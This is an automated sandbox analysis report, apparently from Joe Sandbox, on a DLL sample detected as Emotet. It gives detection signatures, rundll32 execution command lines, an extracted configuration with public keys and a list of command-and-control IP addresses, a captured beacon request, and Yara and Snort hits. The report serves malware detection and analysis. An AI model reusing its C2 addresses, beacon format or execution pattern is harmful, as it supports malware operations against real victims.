Play interactive tour

Edit tour

Windows Analysis Report 5YO8hZg21O

Overview

General Information

Sample Name:	5YO8hZg21O (renamed file extension from none to dll)
Analysis ID:	524860
MD5:	5396135926f3d561823702e15191897a
SHA1:	d69e5939a0fdac94d31fb7c782727e9e8bced2a0
SHA256:	ac0c7a80d4eaf440526bd4b902e31bac13c09c94ca946dbd5591fd7c09d668f2
Tags:	32dllexe
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Emotet RunDLL32 Process Creation

Multi AV Scanner detection for domain / URL

Tries to detect virtualization through RDTSC time measurements

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Queries disk information (often used to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6668 cmdline: loaddll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6736 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6792 cmdline: rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7140 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6780 cmdline: rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 772 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo",xBPZ MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5732 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kcjcdjrdnmqurw\wsxegqzrq.heo",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6876 cmdline: rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,abziuleoxsborpb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6276 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7020 cmdline: rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,aejkroaebsbxdnkhb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6416 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 2528 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

svchost.exe (PID: 6888 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4936 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 4004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 7080 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 1312 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.459119053.000000000341A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.462364516.0000000002F9A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.406496894.00000000034AA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000001.00000002.462832524.0000000000B7A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000010.00000002.869632887.00000000030FA000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000009.00000002.471606182.0000000000B2A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000003.00000002.458372363.00000000032B5000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
9.2.rundll32.exe.b44230.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.b8b540.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
1.2.loaddll32.exe.b8b540.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.34c4df8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.34c4df8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.34343b8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
9.2.rundll32.exe.b44230.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.3114f88.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.34343b8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.2fb4358.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
16.2.rundll32.exe.3114f88.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.2fb4358.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 7 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 6792, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL, ProcessId: 7140

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 1.2.loaddll32.exe.b8b540.0.raw.unpack

Malware Configuration Extractor: Emotet {"Public Key": ["RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW", "RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0"], "C2 list": ["51.178.61.60:443", "168.197.250.14:80", "45.79.33.48:8080", "196.44.98.190:8080", "177.72.80.14:7080", "51.210.242.234:8080", "185.148.169.10:8080", "142.4.219.173:8080", "78.47.204.80:443", "78.46.73.125:443", "37.44.244.177:8080", "37.59.209.141:8080", "191.252.103.16:80", "54.38.242.185:443", "85.214.67.203:8080", "54.37.228.122:443", "207.148.81.119:8080", "195.77.239.39:8080", "66.42.57.149:443", "195.154.146.35:443"]}

Multi AV Scanner detection for submitted file

Show sources

Source: 5YO8hZg21O.dll

Virustotal: Detection: 21%

Perma Link

Multi AV Scanner detection for domain / URL

Show sources

Source: https://51.178.61.60/

Virustotal: Detection: 9%

Perma Link

Source: 5YO8hZg21O.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49744 version: TLS 1.2

Source: 5YO8hZg21O.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F1AD1EE FindFirstFileExA,	1_2_6F1AD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F1AD1EE FindFirstFileExA,	3_2_6F1AD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA1A80 FindFirstFileW,	16_2_00EA1A80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.6:49744 -> 51.178.61.60:443

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 51.178.61.60 187

Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 51.178.61.60:443
Source: Malware configuration extractor	IPs: 168.197.250.14:80
Source: Malware configuration extractor	IPs: 45.79.33.48:8080
Source: Malware configuration extractor	IPs: 196.44.98.190:8080
Source: Malware configuration extractor	IPs: 177.72.80.14:7080
Source: Malware configuration extractor	IPs: 51.210.242.234:8080
Source: Malware configuration extractor	IPs: 185.148.169.10:8080
Source: Malware configuration extractor	IPs: 142.4.219.173:8080
Source: Malware configuration extractor	IPs: 78.47.204.80:443
Source: Malware configuration extractor	IPs: 78.46.73.125:443
Source: Malware configuration extractor	IPs: 37.44.244.177:8080
Source: Malware configuration extractor	IPs: 37.59.209.141:8080
Source: Malware configuration extractor	IPs: 191.252.103.16:80
Source: Malware configuration extractor	IPs: 54.38.242.185:443
Source: Malware configuration extractor	IPs: 85.214.67.203:8080
Source: Malware configuration extractor	IPs: 54.37.228.122:443
Source: Malware configuration extractor	IPs: 207.148.81.119:8080
Source: Malware configuration extractor	IPs: 195.77.239.39:8080
Source: Malware configuration extractor	IPs: 66.42.57.149:443
Source: Malware configuration extractor	IPs: 195.154.146.35:443

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: EcobandGH EcobandGH

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic

HTTP traffic detected: GET /GQAhghQYtMriyhSsHMSeUCAGKsKrpTqI HTTP/1.1Cookie: BVq=wHBtME3BTvrsq6ERaxvqV74K175PcHA24bIWLDvPLoS1yKbr56Te7Vwjn8yCzOb5uzKJ+NM/RhoV/mJ/gEOd2piZqQlfbkOPLRNqvIQh34bv6jYQ4eiZWAF5phOpnxaIL7NaJmqh2Rh3BnY6Al2CP1ZA3YwrRE+JwhxIfOAtxkeWKcmFs+sB1vzHELNH5hCfiAG33DpQULpyZwsTzH1N2WMTRxF8XKCrAEZVjYtSxpcgZyxbIS111PWiNLscb+HuEFGnWkXsxMJgHhIGJCK0WJlO7KRDP6W4uiWwbI3Rqiedq147jj+TLE3bLUWRJYyiP8n0GEM=Host: 51.178.61.60Connection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View	IP Address: 196.44.98.190 196.44.98.190

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60
Source: unknown	TCP traffic detected without corresponding DNS query: 51.178.61.60

Source: svchost.exe, 0000001B.00000003.735530689.000001D765D6C000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-16T17:55:04.3185617Z\|\|.\|\|2bbf585d-742f-4e5f-bf99-34064e28fbbf\|\|1152921505694183347\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 0000001B.00000003.735530689.000001D765D6C000.00000004.00000001.sdmp	String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-16T17:55:04.3185617Z\|\|.\|\|2bbf585d-742f-4e5f-bf99-34064e28fbbf\|\|1152921505694183347\|\|Null\|\|fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"

Source: rundll32.exe, 00000010.00000003.534280239.0000000003193000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.862885542.000001B689888000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.753661447.000001D765D00000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: svchost.exe, 00000011.00000002.862795195.000001B689815000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.753661447.000001D765D00000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	String found in binary or memory: http://help.disneyplus.com.
Source: rundll32.exe, 00000010.00000002.869671653.000000000314A000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/
Source: rundll32.exe, 00000010.00000002.869671653.000000000314A000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/.Tw
Source: rundll32.exe, 00000010.00000002.869693856.0000000003173000.00000004.00000001.sdmp	String found in binary or memory: https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqI
Source: rundll32.exe, 00000010.00000002.869632887.00000000030FA000.00000004.00000020.sdmp	String found in binary or memory: https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqIT
Source: rundll32.exe, 00000010.00000002.869693856.0000000003173000.00000004.00000001.sdmp	String found in binary or memory: https://51.178.61.60/GQAhghQYtMriyhSsHMSeUCAGKsKrpTqITg3
Source: svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	String found in binary or memory: https://disneyplus.com/legal.
Source: svchost.exe, 0000001B.00000003.740353956.000001D766202000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.740249361.000001D765D98000.00000004.00000001.sdmp	String found in binary or memory: https://support.hotspotshield.com/
Source: svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
Source: svchost.exe, 0000001B.00000002.753863397.000001D765D6C000.00000004.00000001.sdmp	String found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
Source: svchost.exe, 0000001B.00000003.740353956.000001D766202000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.740249361.000001D765D98000.00000004.00000001.sdmp	String found in binary or memory: https://www.hotspotshield.com/terms/
Source: svchost.exe, 0000001B.00000003.740353956.000001D766202000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.740249361.000001D765D98000.00000004.00000001.sdmp	String found in binary or memory: https://www.pango.co/privacy

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_00EB1027 InternetReadFile,

16_2_00EB1027

Source: global traffic

Source: unknown

HTTPS traffic detected: 51.178.61.60:443 -> 192.168.2.6:49744 version: TLS 1.2

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F185EE0 GetClipboardViewer,GetClipboardViewer,GetSystemDefaultLangID,GetOpenClipboardWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,GetCurrentThread,GetForegroundWindow,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,AnyPopup,GetUserDefaultUILanguage,GetUserDefaultUILanguage,GetCurrentThread,GetCurrentThread,GetErrorMode,GetErrorMode,GetThreadErrorMode,

1_2_6F185EE0

E-Banking Fraud:

Yara detected Emotet

Show sources

Source: Yara match	File source: 9.2.rundll32.exe.b44230.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.b8b540.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.loaddll32.exe.b8b540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.34c4df8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.34c4df8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.34343b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.b44230.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.3114f88.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.34343b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2fb4358.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.3114f88.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.2fb4358.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.459119053.000000000341A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.462364516.0000000002F9A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.406496894.00000000034AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.462832524.0000000000B7A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.869632887.00000000030FA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.471606182.0000000000B2A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.458372363.00000000032B5000.00000004.00000020.sdmp, type: MEMORY

System Summary:

Source: 5YO8hZg21O.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Kcjcdjrdnmqurw\

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CACAA8	1_2_00CACAA8
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C9441E	1_2_00C9441E
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CA43B3	1_2_00CA43B3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CABEC9	1_2_00CABEC9
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CA0ADE	1_2_00CA0ADE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CB08D1	1_2_00CB08D1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CA7ED1	1_2_00CA7ED1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CACCD4	1_2_00CACCD4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CAAEEB	1_2_00CAAEEB
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CAECE3	1_2_00CAECE3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CAA8F0	1_2_00CAA8F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CADEF4	1_2_00CADEF4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C930F6	1_2_00C930F6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CA4E8A	1_2_00CA4E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CA748A	1_2_00CA748A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C9CC8D	1_2_00C9CC8D
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C97283	1_2_00C97283
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CB0687	1_2_00CB0687
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CAAC9B	1_2_00CAAC9B
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C93C91	1_2_00C93C91
